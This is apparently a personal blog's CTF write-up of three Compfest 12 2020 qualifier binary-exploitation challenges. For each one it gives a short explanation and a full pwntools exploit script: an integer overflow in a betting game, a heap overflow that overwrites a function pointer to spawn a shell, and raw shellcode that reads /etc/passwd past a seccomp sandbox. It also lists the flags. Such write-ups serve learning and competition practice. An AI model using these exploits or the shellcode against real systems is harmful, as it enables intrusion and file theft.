Hello i am arsalan. information system student, i blog about cyber security, ctf writeup , web development , and more about tech. born and raised in indonesia , currently living in indonesia

Posts   About

Compfest 12 2020 CTF quals

Writeup Compfest 12 2020 CTF quals

Gambling Problem 2

Description

dek depe menemukan service judi onlen dari forum redacted. Karena service judi online ini baru buka, pengguna diberikan uang untuk memulai karir perjudian. Setelah diberi bin file lewat orang dalem, dek depe menyadari ternyata terdapat bug mematikan dalam program tersebut. Bantulah dek depe memanfaatkan exploit tersebut!

nc 128.199.157.172 25880

Solve

to solve this challenge we need to have money at least 0xdeadbeef or 3735928559 in decimal. we can get more money on gameTime() function.

to get more money, we have to place our bet on gameTime() function if we can guess a random number we can get 5 times from our stake, there is also format string bug on input bet

but I prefer to use another bug, which can easy to exploit lol.

there is an integer overflow in -5 * taruhan we can still increase our money even we guess the wrong number. my exploit:

from pwn import *
r = remote('128.199.157.172',25880)

r.sendlineafter(":","1")
r.sendlineafter(":",'1')
r.sendlineafter(":",str(0xffffff))
r.sendlineafter(":",'1')
r.sendlineafter(":",'0')
r.sendlineafter(":",'2')
r.sendlineafter(":",'1')
# r.sendlineafter(":",str(0xbeefbeef))
r.interactive()

FLAG: COMPFEST12{laptop_pembuat_soalnya_BSOD_so_this_is_Zafirr_again_lol_39cbc5}

Binary Exploitation is Ez

Description

Take a break, here’s an easy problem

nc 128.199.157.172 23170

Solve

this is an easy challenge, there is buffer overflow in edit_mem().

and my_print() is stored on the heap that close to our input

in print_meme() function, my_print() is being called to print our content from heap

so, we can use buffer overflow in edit_mem() to overwrite my_print() with EZ_WIN() function and then call print_mem(), so that we can get a shell

my exploit:

#!/usr/bin/env python2
import sys
from pwn import *
context.update(arch="amd64", endian="little", os="linux", log_level="info",
               terminal=["tmux", "split-window", "-v", "-p 85"],)
LOCAL, REMOTE = False, False
TARGET=os.path.realpath("/home/tripoloski/code/ctf/compfest2020/binex/binex-is-easy/ez")
elf = ELF(TARGET)

def attach(r):
    if LOCAL:
        bkps = []
        gdb.attach(r, '\n'.join(["break %s"%(x,) for x in bkps]))
    return

def newMeme(size,con):
    r.sendlineafter(":",'1')
    r.sendlineafter(':',str(size))
    r.sendlineafter(':',str(con))

def editMeme(idx,con):
    r.sendlineafter(":",'2')
    r.sendlineafter(':',str(idx))
    r.sendlineafter(':',str(con))

def printMeme(idx):
    r.sendlineafter(":",'3')
    r.sendlineafter(':',str(idx))

def exploit(r):
    # attach(r)
    win = 0x00000000004014a0
    p = ("A" * 8) * 3
    p += p64(0x21)
    p += p64(win)
    newMeme(10,"BBBBBBBB")
    newMeme(10,"C"*8)
    newMeme(10,"D"*8)
    editMeme(0,p)
    newMeme(10,"IIIIIIII")

    r.sendline("3")
    r.sendline("1")
    r.interactive()
    return

if __name__ == "__main__":
    if len(sys.argv)==2 and sys.argv[1]=="remote":
        REMOTE = True
        r = remote("128.199.157.172", 23170)
    else:
        LOCAL = True
        r = process([TARGET,])
    exploit(r)
    sys.exit(0)

FLAG: COMPFEST12{C_i_told_u_its_ez_loooooooool_257505}

Sandbox King

Description

You have to get a shell. The seccomp is easy to bypass right?

nc 128.199.104.41 25171

Solve

according to the pseudocode

we can just send a shellcode to get a shell.

my exploit:

from pwn import *

r = remote("128.199.104.41",25171)

sh = "\xeb\x2f\x5f\x6a\x02\x58\x48\x31\xf6\x0f\x05\x66\x81\xec\xef\x0f\x48\x8d\x34\x24\x48\x97\x48\x31\xd2\x66\xba\xef\x0f\x48\x31\xc0\x0f\x05\x6a\x01\x5f\x48\x92\x6a\x01\x58\x0f\x05\x6a\x3c\x58\x0f\x05\xe8\xcc\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
r.sendline(sh)
r.interactive()

FLAG: COMPFEST12{C0nGr4TTSSS_U_r_D_SssssssssAnd60X_K111ng9g99_1c7dbf}